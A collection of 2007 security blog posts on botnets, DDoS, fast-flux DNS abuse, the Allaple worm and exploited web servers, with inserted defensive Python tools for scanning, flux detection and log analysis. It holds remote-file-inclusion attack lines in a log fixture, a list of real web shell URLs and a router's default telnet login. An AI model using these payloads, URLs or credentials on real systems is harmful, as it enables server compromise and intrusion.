WMD in Second Life

hi guys and gals, how are you all doing? :)

i’ve always been a fan of virtual worlds (although for my own life’s sake, i don’t participate in them). this time around it’s about what some refer to as a wmd, and i like it.


funny how history repeats itself and he couldn’t control his “virus”. :)

gadi evron,


War Fears Turn Digital After Data Siege in Estonia

The New York Times carries a good popular-level accounting of what happened in the recent Estonian information warfare incident. Suggested reading.

http://www.nytimes.com/2007/05/29/technology/29estonia.html (subscription required)
Syndicated: Times Daily


Botnets are old-fashioned – P2P networks are behind massive DDoS attacks

The new trend in organizing Distributed Denial of Service attacks is the use of P2P networks.

This is how Netcraft describes the situation:

large numbers of client computers running P2P software are tricked into requesting a file from the intended target of the DDoS, allowing the attacker to use the P2P network to overwhelm the target site with traffic.

The Netcraft entry also points to an alert from Florida-based Prolexic Technologies, which shares more technical details and information about the number of clients and the traffic being generated.
A very nice catch, Rich Miller of Netcraft!


DDoS against Finnish broadcasting company took 3 days

Today was the third day that the Web site of the Finnish broadcasting company YLE (Yleisradio) suffered problems from a large-scale DDoS attack.

From the YLE News site:

The company’s web pages were targeted by a concerted attack on Monday and Tuesday. Two other major web sites, those of the telecommunications service provider Eniro and the Suomi24 portal, also reported a similar attack.

There are several possible motives: Finland hosted the Eurovision Song Contest 2007 last weekend, and our team took second place in the hockey World Championship the following day.

Some people said earlier that there were connections to the recent DoS attacks on Estonian government sites too.


Broadband routers and botnets – being proactive

in this post i’d like to discuss the threat that widely circulated insecure broadband routers pose today. we have touched on it before.

today, yet another public report of a vulnerable dsl modem type was posted to bugtraq, this time about a potential wireless flaw leaving deutsche telekom’s broadband routers insecure. i haven’t verified this one myself, but it refers to the “deutsche telekom speedport w700v broadband router”:

if you all remember, there was another report a few months ago, as another example, about a uk isp named bethere whose wireless router was accessible from the internet and exploitable:

two issues here:
1. illegitimate access to broadband routers via wireless communication.
2. illegitimate access to broadband routers via the wan.

i’d like to discuss #2.

some isps which provide such devices (as in the example of #2 above) use them as bridges only, preventing several attack vectors (although not all). many others don’t. most broadband isps have a vulnerable user-base on some level.

many broadband isps around the world distribute such devices to their clients.

although the general risk is well known, as with many other security issues many of us remained mostly quiet in the hope of avoiding massive exploitation. as usual, we only delayed the inevitable. i fear that the lack of awareness among some isps of this “not yet widely exploited threat” has resulted in us not being proactive and not taking action to secure the internet in this regard. what else is new: we are all too busy with yesterday’s fires to worry about tomorrow’s.
good people will react and solve the problem when it pops up in wide exploitation, but what we may potentially be facing is yet another vector for massive infections and the creation of eventual bot armies on yet another platform.

my opinion is that, with all these public disclosures and a ripe pool of potential victims, the delay in massive exploitation of this threat may not last. i believe there is currently a window of opportunity for service providers to act and secure their user-base without rushing. nothing in security is ever perfect, but actions such as changing default passwords and preventing connections from the wan to these devices would be a good step to consider if you haven’t already.

my suggestion would be to take a look at your infrastructure and what your users use, and if you haven’t already, add some security there. you probably have a remote login option for your tech support staff which you may want to explore – and secure. that’s if things were not left at their defaults.

then, i’d also suggest scanning your network for what types of broadband routers your users make use of, and how many of your clients have port 23 or 80 open. whether you provide the devices or not, many users will be running different ones left at their defaults, which may pose a similar threat. being aware of the current map of vulnerable devices of this type in your networks can’t hurt.
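One way to turn such a scan of your own address pool into the inventory the post asks for, as an added example (not code from the post): it parses nmap’s grepable (-oG) output and counts which customer devices answer on telnet (23) or http (80) from the WAN side. The scan text, addresses and banner strings below are constructed.

```python
"""Summarise which customer CPE devices answer on telnet (23) or http (80)
from the WAN side, using an nmap grepable-output scan of the ISP's own
address pool.  Added example, not from the post; the scan text is constructed."""
from collections import Counter

# Constructed nmap -oG lines; addresses and banners are made up.  Each port
# entry is port/state/proto/owner/service/rpc/version/, and the version slot
# is only filled when nmap was run with service detection (-sV).
SAMPLE_SCAN = """\
Host: 203.0.113.10 ()\tPorts: 23/open/tcp//telnet//CPE-model-A telnetd/, 80/open/tcp//http//CPE-model-A httpd/\tIgnored State: closed (998)
Host: 203.0.113.11 ()\tPorts: 23/closed/tcp//telnet///, 80/open/tcp//http//CPE-model-B httpd/\tIgnored State: closed (998)
Host: 203.0.113.12 ()\tStatus: Down
Host: 203.0.113.13 ()\tPorts: 23/open/tcp//telnet//CPE-model-A telnetd/, 80/filtered/tcp//http///\tIgnored State: closed (998)
Host: 203.0.113.14 ()\tPorts: 22/open/tcp//ssh///, 23/closed/tcp//telnet///, 80/closed/tcp//http///\tIgnored State: closed (997)
"""

WATCHED_PORTS = (23, 80)   # the two management ports the post suggests counting


def parse_grepable(text):
    """Yield (ip, {port: (state, version)}) for each host line that lists ports."""
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        ports = {}
        for entry in fields["Ports"].split(", "):
            parts = entry.split("/")
            ports[int(parts[0])] = (parts[1], parts[6])
        yield ip, ports


def exposure_report(text):
    """Hosts reachable on each watched port, plus a per-model count of exposed CPE."""
    open_on = {port: [] for port in WATCHED_PORTS}
    by_model = Counter()
    hosts_up = 0
    for ip, ports in parse_grepable(text):
        hosts_up += 1
        models = set()
        for port in WATCHED_PORTS:
            state, version = ports.get(port, ("closed", ""))
            if state == "open":
                open_on[port].append(ip)
                # first word of the version string as a rough model label;
                # "unknown" when the scan carried no banner
                models.add(version.split()[0] if version else "unknown")
        for model in models:
            by_model[model] += 1
    exposed = sorted(set(open_on[23]) | set(open_on[80]))
    return {"hosts_up": hosts_up, "telnet_open": open_on[23],
            "http_open": open_on[80], "exposed_hosts": exposed,
            "by_model": dict(by_model)}


if __name__ == "__main__":
    report = exposure_report(SAMPLE_SCAN)
    print(f"{len(report['exposed_hosts'])} of {report['hosts_up']} hosts expose telnet or http")
    for model, n in sorted(report["by_model"].items()):
        print(f"  {model}: {n}")
```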

it is not often that we can predict which of the numerous threats out there that we do not address currently, is going to become exploited next. if you can spare the effort, i’d strongly urge you to explore this front and be proactive on your own networks.

the previous unaddressed threat which most of us chose to ignore was spoofing. we all knew of it for a very long time, but some of us believed it did not pose a threat to the internet or their networks for no other reason than “it is not currently being exploited” and “there are enough bots out there for spoofing to not be necessary”. i still remember the bitter argument i had with randy bush over that one. this is a rare opportunity, let’s not waste it.

we are all busy, but i hope some of you will have the time to look into this.

i am aware of, and have assisted, several isps who spent some time and effort exploring this threat and in some cases acting on it. if anyone can share their experience of securing their infrastructure in this regard publicly, it would be much appreciated.


gadi evron,


A Botted Fortune 500 a Day

support intelligence releases daily reports on different fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks.

you can find more information on their blog:

they are good people, and they know botnets.

gadi evron,


On-going Internet Emergency and Domain Names

there is a current on-going internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated.

this incident is currently being handled by several operational groups.

this past february, i sent an email to the reg-ops (registrar operations) mailing list. the email, which is quoted below, states how dns abuse (not the dns infrastructure) is the biggest unmitigated current vulnerability in day-to-day internet security operations, not to mention abuse.

while we argue about this or that tld, there are operational issues of the highest importance that are not being addressed.

the following is my original email message, elaborating on these above statements. please note this was indeed just an email message, sent among friends.

date: fri, 16 feb 2007 02:32:46 -0600 (cst)
from: gadi evron
to: reg-ops@…
subject: [reg-ops] internet security and domain names

hi all, this is a tiny bit long. please have patience, this is important.

on this list (which we maintain as low-traffic) you guys (the registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call “the internet security operations community”.

we face problems today though, that you can not help us solve under the current setting. but only you can help us come up with new ideas.

day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can’t handle this. i don’t blame you.

in emergencies, we can only mitigate threats if one of you or yours is in control. just a week ago we faced the problem of the dolphins stadium being hacked and malicious code being put on it:

1. we tracked down all the ip addresses involved and mitigated them (by we i mean also people other than me. many were involved).
2. we helped the dolphins stadium it staff take care of the malicious code on their web page (specifically gary warner).
3. we coordinated with law enforcement.
4. we coordinated that no one does a press release which will hurt law enforcement.
5. we did a lot more. including actually convincing a chinese registrar to pull one of the domains in question. a miracle. there was another domain to be mitigated, unsuccessfully.

one thing though – at a second’s notice, this could all be for nothing as the dns records could be updated with new ip addresses. there were hundreds of other sites also infected.

even if we could find the name server admin, some of these domains have as many as 40 nss. that doesn’t make life easy. then, these could change, too.

this is the weakest link online today in internet security, which we in most cases can’t mitigate, and the only mitigation route is the domain name.

every day we see two types of fast-flux attacks:
1. those that keep changing a records by using a very low ttl.
2. those that keep changing ns records, pretty much the same.

now, if we have a domain which can be mitigated to solve such emergencies and one of you happen to run it, that’s great…
however, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. sorry for the language.

icann has a lot of policy issues as well, and the good guys there can’t help. icann has enough trouble taking care of all those who want money for .com, .net or .xxx.

all that being said, the current situation can not go on. we can no longer ignore it nor are current measures sufficient. it is imperative that we find some solutions, as limited as they may be.

we need to be able to get rid of domain names, at the very least during real emergencies. i am aware how it isn’t always easy to distinguish what is good and what is bad. still, we need to find a way.

members of reg-ops:
what do you think can be conceivably done? how can we make a difference which is really needed on today’s internet?

please participate and let me know what you think, we simply can no longer wait for some magical change to happen.


thousands of malicious domain names and several weeks later, we face the current crisis. the 0day vulnerability is exploited in the wild, and mitigating the ip addresses is not enough. we need to be able to “get rid” of malicious domain names. we need to be able to mitigate attacks on the weakest link – dns, which are not necessarily solved by dns-sec or anycast.
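The two fast-flux patterns from the email above (A records rotated under a very low TTL, and NS records that keep changing) can be picked out of a series of DNS answers; the following is an added example, not code from the post or the isotf, with constructed observations on the reserved .test TLD and documentation address ranges. The TTL and distinct-value thresholds are assumptions of the example.

```python
"""Flag the two fast-flux patterns described in the email above in a
series of DNS answers.  Added example, not from the post; data constructed."""
from collections import defaultdict

# Constructed observations, in time order: (qname, rrtype, rdata, ttl).
OBSERVATIONS = (
    # pattern 1: a fresh A record on every lookup, TTL of one minute
    [("flux-a.test", "A", f"192.0.2.{i}", 60) for i in range(1, 9)]
    # pattern 2: the NS set itself keeps changing
    + [("flux-ns.test", "NS", f"ns{i}.flux-ns.test", 300) for i in range(1, 9)]
    # CDN-like name: low TTL but a small, stable address set -> not flux
    + [("cdn.test", "A", f"198.51.100.{1 + i % 2}", 30) for i in range(8)]
    # ordinary static name
    + [("static.test", "A", "203.0.113.5", 86400) for _ in range(8)]
)


def classify_flux(observations, low_ttl=300, min_distinct=5):
    """Return {qname: {"labels": set, "distinct": {"A": n, "NS": n}}}.

    Thresholds are assumptions of this example: a name is 'A-flux' when at
    least `min_distinct` different addresses were seen with a TTL <= low_ttl,
    and 'NS-flux' when at least `min_distinct` different name servers were
    seen.  The distinct counts show how many IPs or NSs would have to be
    chased one by one, versus the single domain name that covers them all.
    """
    values = defaultdict(lambda: defaultdict(set))   # qname -> rrtype -> rdata
    lowest_ttl = defaultdict(dict)                    # qname -> rrtype -> min ttl
    for qname, rrtype, rdata, ttl in observations:
        values[qname][rrtype].add(rdata)
        prev = lowest_ttl[qname].get(rrtype, ttl)
        lowest_ttl[qname][rrtype] = min(prev, ttl)
    verdict = {}
    for qname, by_type in values.items():
        a_records = by_type.get("A", set())
        ns_records = by_type.get("NS", set())
        labels = set()
        if len(a_records) >= min_distinct and lowest_ttl[qname]["A"] <= low_ttl:
            labels.add("A-flux")
        if len(ns_records) >= min_distinct:
            labels.add("NS-flux")
        verdict[qname] = {"labels": labels,
                          "distinct": {"A": len(a_records), "NS": len(ns_records)}}
    return verdict


if __name__ == "__main__":
    for qname, info in classify_flux(OBSERVATIONS).items():
        tag = ",".join(sorted(info["labels"])) or "clean"
        print(f"{qname:15} {tag:8} distinct A={info['distinct']['A']} NS={info['distinct']['NS']}")
```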

on reg-ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem to be on the agenda of those running dns:

1. a system by which registrars can acknowledge confirmed bad domains (under strict guidelines) and respond to the reports according to their aup and icann policy, thus “getting rid” of them in a much quicker fashion, is being set up at the isotf. a black list for registrars, if you will. this is far from perfect and currently slow-going. naturally, this can not be forced on all registrars, nor do the black hat ones care.

2. a black list for resolvers (hopefully large service providers) is also being created at the isotf, so that the risk of visibility of bad domains, as will be defined, can be minimized. naturally, no provider can be forced to use this list and there are millions of unaffiliated resolvers, etc.

other options that have been raised as technically possible, but considered unlikely and indeed, bad:

3. setting up a black list of domain names for tld servers, for them not to respond on.

4. creating an alternate root which we could trust.

another suggestion which was raised:

5. apply to change the icann policy.

we need a solution. this operational issue needs to be added as a main agenda item today so that tomorrow we will be ready to mitigate it. i blame myself to some degree for not raising this with higher echelons 2 and 3 years ago due to respect to those who have been working on dns for many years, but what’s done is done.

the operational communities do not always know how to voice their needs or the difficulties they face. nor will everyone agree on what the issues are. it is my strong belief (which is obviously my personal opinion), based on facts we see in daily security operations on the internet that this issue is paramount, and i am sending here a call for help to the dns experts of the world: what is our next step to be?

what do we currently intend to do (not my personal opinion):
we are formalizing a letter to icann’s ssac, as they are the top experts on dns infrastructure security issues, coming from operational folks at the isotf dealing with daily usage of the dns for abuse purposes (and specifically fastflux).

further, the isotf is moving forward with items #1 and #2 as mentioned above. #3 will have to remain as a contingency, #4 we have no influence to affect. #5 is currently being explored.

are we missing a possible solution? what does the larger community suggest?

gadi evron,


Targets of Allaple DoS-worm released

Information about the target Web sites of polymorphic worm Allaple has been released. Finnish CERT-FI unit has posted information to Bleeding Edge Threats Wiki database.

According to the report the targets are

www.if.ee and

Note: The report is not fully visible when browsing with Safari. Firefox on XP and Mac are working OK.

AS Starman is a Tallinn-based cable-TV operator and ISP. If P&C Insurance Company is a subsidiary of the Finnish Sampo Group.
Reportedly the worms have absolutely no Command and Control channels in them, i.e. even if the author of the worm wants to disable these worms, he or she can’t do it. The only solution is to patch the affected machines with MS04-012 – or format these workstations.

The first reports of the worm are from July 2006. This DoS attack is not a minor issue.
If you see this worm in your organization there are some typical characteristics:

* ICMP packets with the mystery string ‘Babcdefghijklmnopqrstuvwabcdefghi’
* HTTP GET requests to www.if.ee
* TCP SYN packets to www.if.ee (port 97)
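The three characteristics above can be matched against packet records to find infected hosts on your own network; this is an added example, not from the post, working on constructed (src, proto, dst, dport, tcp_flags, payload) records such as an IDS or a small pcap parser would hand over. Treating a lone HTTP GET as weak evidence is an assumption of the example.

```python
"""Match the Allaple traffic characteristics listed above against packet
records.  Added example, not from the post; records are constructed."""
from collections import defaultdict

ALLAPLE_ICMP_MARKER = "Babcdefghijklmnopqrstuvwabcdefghi"
TARGET = "www.if.ee"
TARGET_SYN_PORT = 97

# Constructed packet records: (src, proto, dst, dport, tcp_flags, payload).
PACKETS = [
    ("10.0.0.5", "ICMP", TARGET, None, "", ALLAPLE_ICMP_MARKER),
    ("10.0.0.5", "TCP", TARGET, 97, "S", ""),
    ("10.0.0.5", "TCP", TARGET, 80, "PA", "GET / HTTP/1.1\r\nHost: www.if.ee\r\n\r\n"),
    # ordinary browsing of the target site by an uninfected host
    ("10.0.0.9", "TCP", TARGET, 80, "PA", "GET /news HTTP/1.1\r\nHost: www.if.ee\r\n\r\n"),
    # a normal ping payload: same letters, but without the leading 'B'
    ("10.0.0.12", "ICMP", "192.0.2.1", None, "", "abcdefghijklmnopqrstuvwabcdefghi"),
    ("10.0.0.12", "TCP", "192.0.2.1", 22, "S", ""),
]


def indicators(src, proto, dst, dport, flags, payload):
    """Return the set of Allaple indicators a single packet matches."""
    hits = set()
    if proto == "ICMP" and ALLAPLE_ICMP_MARKER in payload:
        hits.add("icmp-marker")
    if (proto == "TCP" and dst == TARGET and dport == TARGET_SYN_PORT
            and "S" in flags and "A" not in flags):
        hits.add("syn-97")
    if proto == "TCP" and payload.startswith("GET ") and f"Host: {TARGET}" in payload:
        hits.add("http-get")
    return hits


def suspected_hosts(packets, strong=("icmp-marker", "syn-97")):
    """Per-source indicator sets, plus the sources worth cleaning up.

    A lone HTTP GET to the target can be a legitimate visitor, so (an
    assumption of this example) a host is reported only when it also shows
    one of the strong indicators.  There is no C&C to cut off, so the
    reported hosts need MS04-012 or a rebuild, as the post says.
    """
    seen = defaultdict(set)
    for pkt in packets:
        seen[pkt[0]] |= indicators(*pkt)
    flagged = sorted(src for src, hits in seen.items() if hits & set(strong))
    return dict(seen), flagged


if __name__ == "__main__":
    per_host, flagged = suspected_hosts(PACKETS)
    for src, hits in per_host.items():
        print(f"{src:10} {sorted(hits)}")
    print("clean up:", flagged)
```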

This worm has several names – aka W32/Allaple-B, Rahack.W and Rahack.BB.


ICANN Releases Factsheet on Root DNS Attack

You can find their PDF document here:

(thanks Fergie)


Accidental backdoor by ISP [updated x2]

I’ve been a happy customer of my ISP BeThere for a few months now. Overall they’re great, they are quick to sort you out with your connection, their emails and other communications are very humorous and actually make good reading (I remember the router’s documentation CD has a warning label reading something like “warning: geeky content inside”). When I signed up I managed to get the username root, this pleased me no end and I thought I’d finally found an ISP I want to stay with forever.

Finding the hole
Recently though a friend of mine was extremely bored and decided to nmap my IP address. He found, and told me, that I seemed to be listening on port 23, telnet. I was extremely puzzled by this, I haven’t port forwarded port 23, I would never use a telnet daemon for anything. It occurred to me that it must be the router itself running the daemon. I telnetted to and lo and behold it asked me to log in. I logged in with the default credentials (yes, I had never gotten around to changing those), which are Administrator:null


How many bots? How many botnets?

we touched on this subject in the past, but recently rich kulawiek wrote a very interesting email to nanog to which i replied, and decided to share my answer here as well –

i stopped really counting bots a while back. i insisted, along with many friends, that counting botnets was what matters. when we reached thousands we gave that up.

we often quoted anti-nuclear weapons proliferation sentiments from the cold war, such as: “why be able to destroy the world a thousand times over if once is more than enough?” we often also changed it to say “3 times” as redundancy could be important. :>

today, it is clear the bad guys can get their hands on as many bots as they need, or in a more scary scenario, want. they don’t need that many.

as a prime example, i believe that verisign made it public that only 200 bots were used in the dns amplification attacks against them last year. even if they missed one, two or even three zeroes, it speaks quite a bit as to our fragile infrastructure.


Web Server Botnets and Server Farms as Attack Platforms

are file inclusion vulnerabilities equivalent to remote code execution? are servers (both linux and windows) now the lower hanging fruit rather than desktop systems?

in the february edition of the virus bulletin magazine, we (kfir damari, noam rathaus and gadi evron (me) of beyond security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms.

web security papers deal mostly with secure coding and application security. in this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily.

we discuss how these attacks work using (mainly) file inclusion vulnerabilities (rfi) and (mainly) php shells.
further, we discuss how isps and hosting farms suffer tremendously from this, and what can be done to combat the threat.


Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]


the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos into attack platforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells have been known for a while, as have file inclusion (or rfi) attacks. however, they were mostly treated as something secondary, and not much attention (if any, save for some blogs and a few mailing list posts a year ago) was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (on which, so far, they have been unchallenged). meaning, aside from research, the web honeynet project will also release actionable data on offensive ip addresses, urls and the tools themselves, to be made available to operational folks so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (and quite loudly, me) have been warning about this for a while; now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public in the february edition of the virus bulletin magazine, from kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com ).

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), …
 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), http://m embers.lycos.co.uk/onuhack/injek.txt? (6), http://m embers.lycos.co.uk/onuhack/cmd.do? (2)
 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)
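A hosting provider can produce a report in this same “ip | hit count | malware (count)” shape from its own web server logs, spotting the file inclusion attempts that the virus bulletin article and this post describe. This is an added example, not the project’s code; the log lines, hosts and IPs are constructed, and the rule for what counts as a remote inclusion (an absolute URL in a parameter that ends with ‘?’ or points at a .txt file) is an assumption of the example.

```python
"""Tally remote file inclusion (RFI) attempts from web server access logs,
in the shape of the honeynet's "ip | hit count | malware (count)" report.
Added example, not the project's code; log lines are constructed."""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines; hosts and IPs are made up.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jan/2007:03:14:07 +0000] "GET /index.php?page=http://malware-host.example/shells/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Jan/2007:03:14:09 +0000] "GET /modules/inc.php?inc=http://malware-host.example/shells/injek.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
192.0.2.20 - - [10/Jan/2007:03:15:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 8211 "-" "Mozilla/5.0"
192.0.2.21 - - [10/Jan/2007:03:15:30 +0000] "GET /login.php?next=http://www.example.com/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2007:03:16:44 +0000] "GET /index.php?page=http://malware-host.example/shells/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Jan/2007:03:20:02 +0000] "GET /gallery/show.php?file=http://other-host.example/tool.txt HTTP/1.0" 200 300 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def included_urls(request_target):
    """Return parameter values that look like remote inclusions.

    Heuristic (an assumption of this example): the value is an absolute
    http/https/ftp URL and either ends with '?' (which turns whatever suffix
    the application appends into a harmless query string) or points at a
    .txt file.  Redirect-style values such as ?next=http://... are left
    alone, which keeps ordinary traffic out of the report.
    """
    query = urlsplit(request_target).query
    hits = []
    for _name, value in parse_qsl(query, keep_blank_values=True):
        low = value.lower()
        if not low.startswith(("http://", "https://", "ftp://")):
            continue
        if value.endswith("?") or urlsplit(value).path.lower().endswith(".txt"):
            hits.append(value)
    return hits


def rfi_report(log_text):
    """Group RFI attempts by source IP: [{ip, hits, urls: {url: count}}, ...]."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        for url in included_urls(target):
            per_ip[ip][url] += 1
    rows = [{"ip": ip, "hits": sum(c.values()), "urls": dict(c)}
            for ip, c in per_ip.items()]
    return sorted(rows, key=lambda r: (-r["hits"], r["ip"]))


if __name__ == "__main__":
    print("ip | hit count | malware (count)")
    for row in rfi_report(SAMPLE_LOG):
        urls = ", ".join(f"{u} ({n})" for u, n in row["urls"].items())
        print(f"{row['ip']} | {row['hits']} | {urls}")
```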


CCC: Router and Infrastructure Hacking

1. at ccc last week raven alder gave a talk on the subject (router and infrastructure hacking), which was pretty neat!

i figure some of you may enjoy this. i hope the video for her talk becomes available soon.


2. there was also a lecture on sflow, by elisa jasinska:
presentation and paper:

3. i do wish the talk on how ccc set up their multiple-uplink gige network for the conference had been filmed. i call this type of “create an isp in 24 hours” in a very, very hostile and busy environment, such as defcon or ccc, “extreme networking”.

they got their own asn for 4 days, set up a hosting farm, surfing, mass wireless, etc. for users, and what-not. they discovered a wireless network vulnerability, a router dos with nexthop memory issues, etc.
not to mention having to fight off ddos non stop, fake aps, thousands of active and abusive users and bgp (i really liked their presentation on ripe’s bgplay – very cool stuff - http://www.ris.ripe.net/bgplay/ ).

3000 end points. 1.6 gigs up, 1.0 gigs down.

their slides are up at:


as mentioned before, ccc itself was very good and a lot of fun, there are many other presentations and videos available for download:


gadi evron,


Botnets, Security Ops and Boxing

What do they have in common?


Second Life: Virtual Worlds Botnet Attacks

hey, do i smell history repeating itself? bots on irc used to be useful too, and then used for local flooding. only later did they become the botnets that they are today. :)

so, from automated playing when you are not around to keep stuff active (rings a bell?) to botnets that throw… privates at people. :)


worth a read. i always love when the real world and the virtual meet, whether by marriages or by physical world police taking complaints because “someone stole my weapon on world of worldcraft!!”

we do live in interesting times. :)

gadi evron,